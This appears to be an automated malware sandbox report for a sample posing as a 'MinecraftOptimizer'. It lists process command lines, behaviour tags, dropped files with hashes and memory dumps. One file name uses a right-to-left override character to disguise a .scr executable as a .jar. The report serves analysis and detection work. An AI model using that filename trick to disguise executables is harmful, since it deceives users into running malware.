C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5800

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4792

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4132

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
- Network Service Discovery
PID:3500

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Checks processor information in registry
- Modifies registry class
PID:6116

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
Filesize
46B

MD5
54d8ba1946d03dea07548c2213a93635

SHA1
4080f33f0496d9ee2ed2b48e36808b7444df823b

SHA256
d6398c9e8db869ec99bba3aa8f47211255c8509931cae761380053abc38bb714

SHA512
678947282820ae269a22e356f3efc9f6a34e6e1488d78529f30a589dd093bcde884d149322f4b6194e620875d6707c7dc6cc1ac314a892f846d970d834db28d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
Filesize
1KB

MD5
4f270f5c6e76943f0155744a04e7b4d7

SHA1
8da29ac4608c9c5d293e5908259befa4c20f5a92

SHA256
3f4a207d891eb48db10d7e846ebc45f2ee823e566a42c1ff758b61a4100fd4bd

SHA512
bed5be666c81928a96b71066489ecb7f2121178df92d34e46c029d739152c0a2f8632f3903e0af3880a99643c4a0d589b0dfa188e2c6d2468e2c455ac6c5cc45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
10KB

MD5
8d3dfd4cc0254541ae2d722079643654

SHA1
d80f21255ace81b23b949e9362146768bc1de320

SHA256
4e5e39f4662122b0b8becb5aceff1c2ac8cc9a2b740b0e7b9ea5e2887b5c069e

SHA512
c28d500f2e27878dacaaa226074cdf974383dfa4ed8ffe5599a5036e2920808c2f7fdd24dfa879b0063cc9bf01c859a26fe72c037866031d8f684a3ba95ff703

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
10KB

MD5
f8ebf2d2588fe87e19d78dd88711c1b1

SHA1
6611ac3cee22ad6beec8e3d79fa982b3f8e782e6

SHA256
d09bd405bb9ccfb0ed90aa905b9ad2631facf4158c47359d1110a1a83a2a33f3

SHA512
f413f7381ea38d30643cfd1e380a6864fba9e0d40794aa115c1fd6a18e722586c789e454d3652b552fc88977a1a86b3bffe24bb2357c6afc696a83a6abcf064a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
39KB

MD5
1e3c1a2e7b4381540975ab61e1d29505

SHA1
6443c318a34aad0225c62b882a8359a31f260790

SHA256
b477c1647cbed62a57378757c4470834e2c11979e0f110951d1f82eaddff0754

SHA512
89723f0103dc43e79da24323aba8e27bc4e9768aa5a41b8f0b5b4fd1542b47d7457bfa4b97a49b8a21a71a6a3d70be2818905823a79215eedd84117a4d32e73b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
880444a7c9aac295cefb532d283dd142

SHA1
f6bd03ec7bc0becae786a28719acf1e3b3cad100

SHA256
2ff334b353d048f17dfcb0f90917bae2c34553b2acd13879ccae4a3d39ba4edf

SHA512
2f6f6e7cf9c5f6156703dba1e79235a7de3a98ab29ffd192e977c0fe5bef836f35fa2ef7a760eef2ca0157e70b3945e18dac6dc884e80aafd5a997be986ec2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-2ba3be5a-6da4-4233-8629-047de1ee3512\files.cab
Filesize
3.0MB

MD5
d622ea5c7e74d6991f2db4d793babb8a

SHA1
82147ec587e2f00583180188778dbd0e335ad30d

SHA256
234fe3e1f6c5b651ed57987e5c4f3323dd564c7986e26392df8f2896e2ae12b0

SHA512
6a13bb9265eb03ce66fb866c306402c6cc4c1fbda218c7c99b7e2d16b04ae20c9cc7d678d58047b8a8f0b09bcd31ad46c19c5df334211cc07dfbe52515921e7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-2ba3be5a-6da4-4233-8629-047de1ee3512\files\MinecraftOptimizer.exe
Filesize
3.0MB

MD5
238ddc1ea9d3d11f788552c2e66e09f7

SHA1
8b56388c2c9691a40e0359aae74875a305d52ef9

SHA256
415c9612cacc66b03913f5c4b444fc65fe5643033eeb2a5ffe093b805024fa22

SHA512
3a4ab49a541721de81eaf991ff633a31dcc15123dfa434e4da8dccdaa2661fbcfb191423922ee4f01adb6482f76ab8abbda07555c46b413e95b0d8d66766b9e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-2ba3be5a-6da4-4233-8629-047de1ee3512\msiwrapper.ini
Filesize
478B

MD5
4a8123da552fb53bab182919a3ee46f4

SHA1
d341b656a897a9676fb7c4b91a7ca4ca819ab2dd

SHA256
86c7f1a35e271f67c0a39afdb103e9187332cfb6779f54644192f16895bce2e2

SHA512
b99dde158f358aefacb0ee104de5342961df1ddd437d6bdec7480350243127cbdb3f54c2a00de9f3b910a330bcd7dbcf53a06bdf0d4af8d2702526515ab37787

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-2ba3be5a-6da4-4233-8629-047de1ee3512\msiwrapper.ini
Filesize
1KB

MD5
65d7cc572ccf01d600eb01afc95a0aab

SHA1
7bd2ac2917cdc18cd52525ff711a41c4b37153db

SHA256
279d29ca88940cbf14a147340caf6955b33621d8b59271a584d47a46453229a4

SHA512
33cbb3e34118251cc13c268f07ff2e4244c73a30a0639b39a7a70a4f0b1a7f81f390d7be7c5a608caa495751013e4681b9533e745860bdc7e5850e44475da707

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-2ba3be5a-6da4-4233-8629-047de1ee3512\msiwrapper.ini
Filesize
1KB

MD5
94233a0805867de27390fc8bb3e1c108

SHA1
3a4c62a7927cf0c2c3a35c5d205fcf0f9cb6410a

SHA256
babd7407e0bbe3fedabf724e04f7d8114f32b3ddd9768c78e56c11840367a0b4

SHA512
76611e8d63ff5974ba7e82baa95638d9e425b8e572d943dbd000c6d98f3adc48fde06d9c52343985edb7688bc9b1b03a3e11ac308553add511620f24f26b1acb

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-2ba3be5a-6da4-4233-8629-047de1ee3512\msiwrapper.ini
Filesize
1KB

MD5
197411c0c1c4a83abbbfec527a36e2ec

SHA1
bf465bf45987a035739c0b9b014cf044cc33ca0d

SHA256
091306e5606ff88c19d755f902c4885d500e7615d8c6f92d8edefe395eb0b8ed

SHA512
0921c820e679505446385426b1899404e2951b4fa98d5e249dd04f1d633d209e28f39ac9effc9be4de7f608735d731c034693e822ee3d2ae0b6dce62fdeb6f62

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-d2dcc52d-8e02-4ce9-9283-f0b9e0f0e818\msiwrapper.ini
Filesize
478B

MD5
53b4935327ec591951a2c7594114ee3a

SHA1
9160c43389b1d652af82b712a29ed80b25ff8f23

SHA256
4b83d4990d86c091b4edf427f8a48d87d49a1d97a4bec8abc1edc8f9dae49b64

SHA512
3f0789a3cd13928013ab0d6fe9885e8120d1c372f2ccee087eb99199285e6e15a927591d05c30a35cf5e573904adfbb3805682b0fa045623be5302afac47e996

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-d2dcc52d-8e02-4ce9-9283-f0b9e0f0e818\msiwrapper.ini
Filesize
1KB

MD5
4d8a80185d499916471efd52b1955445

SHA1
ca9f396959680e28e650ba156429c0dd928eae7d

SHA256
6445adf2b319c5a50eea6f36040c1b44dc653894ae873463daa5a2ef5ef8bbc6

SHA512
11f1760cd65fd67d16fcad7d5d69c68c01f6a6da918f9d20566e19ac7c991054bc3e16e82d21e799470361f054df09a049eca12164a8e125cf5355898b3d3e35

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-d2dcc52d-8e02-4ce9-9283-f0b9e0f0e818\msiwrapper.ini
Filesize
1KB

MD5
c0c7eb733af62dd38aa6f209bbb2317f

SHA1
e33f9cd5996223f1c0322c5396c9638f8db891b7

SHA256
676076d99d9b40696a340b40d4451fe56ca20be9cd563715a86111dce9a22fb7

SHA512
6c4f82998859b7f0341c5563a9a57c1f6a83dd06874d0848117205c73654ce8824154100ce59b8098551eeebad5689fe6498cd31f0a3a9b87f1499610f9b7ebd

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-d2dcc52d-8e02-4ce9-9283-f0b9e0f0e818\msiwrapper.ini
Filesize
1KB

MD5
94cf21974a43bd1f0cb1fc8317f31767

SHA1
bf09301c69dd6e004a39aae9bd5bf686fc28ed4a

SHA256
61b8491b9fe7663cdd4c3310284775d28560ba57cde25c2cbf09049219040e78

SHA512
8ace766bf7a252c0518c8c09d0da33727f35cc790d444b99bf6a90cf1c5333754f2222ecbab94bbf7297adfefcdb0b0049fbfdc089eba8fa9a2a438f8bdaaf0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Minecraft.jar
Filesize
15KB

MD5
071268664b85d1e9dd69d1addb0b2719

SHA1
6d63f8c9bae93d6563044ae9b2ad8822904f7a20

SHA256
40240f4820beafb27527b3541000eff910e1e31a181dcb69b25d2c8f73d745b4

SHA512
6605638460b1b56c35ebc0c88de943ffba8bfe9f5d66e8d7a03c402ddc1b3c1ae92c58ab662074b11ab136a0184e60da47964a628e6a8d9f07a0b1c7d68eb2fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\MinecraftOptimizer‮raj.scr
Filesize
4.6MB

MD5
340e1c3474bd804dcae5371e51feb19b

SHA1
acf022257be475c9e95dd9f6e04495318d5c6359

SHA256
69eef10c3738bcb31b73b74634f1c9a9c1f50e0a1a36419dc7f2fada1ef104f8

SHA512
42cc39989b5aae43bc3e4f6ee195cb7930e56d03fb021ea084cc7d61f44f465b6ecb39d7023aed30be190ff036f169ff274477dd6a8d3675e5601554c679653b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0zo3ehua.ax1.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.exc
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\Videos\Captures\desktop.ini
Filesize
190B

MD5
b0d27eaec71f1cd73b015f5ceeb15f9d

SHA1
62264f8b5c2f5034a1e4143df6e8c787165fbc2f

SHA256
86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

SHA512
7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

Download Submit
C:\Windows\Installer\MSI1EAA.tmp
Filesize
208KB

MD5
0c8921bbcc37c6efd34faf44cf3b0cb5

SHA1
dcfa71246157edcd09eecaf9d4c5e360b24b3e49

SHA256
fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1

SHA512
ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

Download Submit
C:\Windows\LOGS\DPX\setupact.log
Filesize
168KB

MD5
3e3c1789206fdea0b8c3d7ceedd81efe

SHA1
25e84fc930cbedac0602dff991f0cd4c3f72018e

SHA256
690ac89ad1cb1801dad294b526455e902a4cfbf0c4427c9bdd0a5097e478c459

SHA512
8c198d9392afdd17f811cc3a55e9c2512e30ec2b4cc012dbe6d5aa8820811460a680a18dcba046957a3f6aeb574fb403b28af845ae957640c707546648c0c2fb

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
dfd8be63e48b98b5f7a06e8e4b9205d0

SHA1
1ba994011051f2305b15d61640fc09707f94d15b

SHA256
e462706cb55996dc9133a57a0a0ed5a0a9d8e498b78bd085f92df9c8d57b54a7

SHA512
6cb16b6bec6f14d261d179ce1beb94e7efd19de4b2b1b74d451f590fd776b3881a30df561b36b5481ce40f24e5f4a441b8298ef34c1e4c7e482212a0f2ac434f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
11b73ade9e3d5e1e6098d9316d8fa3fc

SHA1
cffbf6a0826b5b313b6862f3000199838f07e69a

SHA256
c2deb433c2e168fa7d0da1ede9769b76a9a1379d8a9158da46718016f2f92585

SHA512
c2472d6fb8610246bf825c3f27e6199f9619ee3cf442e8a1c06b4cd551823e6f2b3f4544d40de6deaed3e134750beec8b12b7245c10908ec239b9bb5440a41bf

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
Filesize
23.7MB

MD5
f8b3f699876c0556042e347a7a23f9be

SHA1
24ab4a2955ce996a6be5cc9150deaed73b31dc0b

SHA256
e1ab8eab279b84f5eb13119bd7b06cce49949b3624684c9576d2731695af4c36

SHA512
9189023d841a37dbe2df976688503f2e82e407fabdc9e8d103bf00987f9e2ceed7598e5ef7e3cf501532ccac9ddc00a788edff4d24adbcb4fcc25a55ac6e1ca5

Download Submit
\??\Volume{ff3ab8f7-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{3f3e0e0b-7b63-4f82-9af2-3c6efd3f2c0c}_OnDiskSnapshotProp
Filesize
6KB

MD5
b7bb45df6491e3282b4caa068bdb17b9

SHA1
1e5b9cf8f431b464e186169989d5b4e5d51e8d6b

SHA256
1969d288d6eea16208e6baa2b2158cffae8548b41502569c5b393d504db7ad5f

SHA512
0eedd511afb6f16eb8a628ca4a89d67965ad310eb224c81d612d33122c55277b11f853d016e1fb3ac6733f31120c05a5b6e665c9308377e14f1af49036d6f805

Download Submit
memory/384-137-0x00007FF9AC690000-0x00007FF9AC6A0000-memory.dmp

Filesize
64KB

Download
memory/384-136-0x0000023D78220000-0x0000023D78247000-memory.dmp

Filesize
156KB

Download
memory/624-128-0x00007FF9AC690000-0x00007FF9AC6A0000-memory.dmp

Filesize
64KB

Download
memory/624-129-0x000002238D8B0000-0x000002238D8D1000-memory.dmp

Filesize
132KB

Download
memory/624-127-0x000002238D940000-0x000002238D967000-memory.dmp

Filesize
156KB

Download
memory/680-131-0x0000016F5BEF0000-0x0000016F5BF17000-memory.dmp

Filesize
156KB

Download
memory/680-132-0x00007FF9AC690000-0x00007FF9AC6A0000-memory.dmp

Filesize
64KB

Download
memory/1436-1468-0x000001F951CA0000-0x000001F951D55000-memory.dmp

Filesize
724KB

Download
memory/2288-124-0x00007FF9EA790000-0x00007FF9EA84E000-memory.dmp

Filesize
760KB

Download
memory/2288-123-0x00007FF9EC610000-0x00007FF9EC805000-memory.dmp

Filesize
2.0MB

Download
memory/2700-108-0x00007FF6EE330000-0x00007FF6EE7DB000-memory.dmp

Filesize
4.7MB

Download
memory/4772-562-0x000001D74BD60000-0x000001D74BD6A000-memory.dmp

Filesize
40KB

Download
memory/4772-566-0x000001D74BDB0000-0x000001D74BDBA000-memory.dmp

Filesize
40KB

Download
memory/4772-565-0x000001D74BDA0000-0x000001D74BDA6000-memory.dmp

Filesize
24KB

Download
memory/4772-564-0x000001D74BD70000-0x000001D74BD78000-memory.dmp

Filesize
32KB

Download
memory/4772-563-0x000001D74BDC0000-0x000001D74BDDA000-memory.dmp

Filesize
104KB

Download
memory/4772-561-0x000001D74BD80000-0x000001D74BD9C000-memory.dmp

Filesize
112KB

Download
memory/4772-560-0x000001D74BC10000-0x000001D74BC1A000-memory.dmp

Filesize
40KB

Download
memory/4772-559-0x000001D74BB50000-0x000001D74BC05000-memory.dmp

Filesize
724KB

Download
memory/4772-558-0x000001D74BB30000-0x000001D74BB4C000-memory.dmp

Filesize
112KB

Download
memory/5820-109-0x000001B8A1420000-0x000001B8A1442000-memory.dmp

Filesize
136KB

Download
memory/6012-103-0x000001F466FE0000-0x000001F466FE1000-memory.dmp

Filesize
4KB

Download
memory/6012-99-0x000001F466FE0000-0x000001F466FE1000-memory.dmp

Filesize
4KB

Download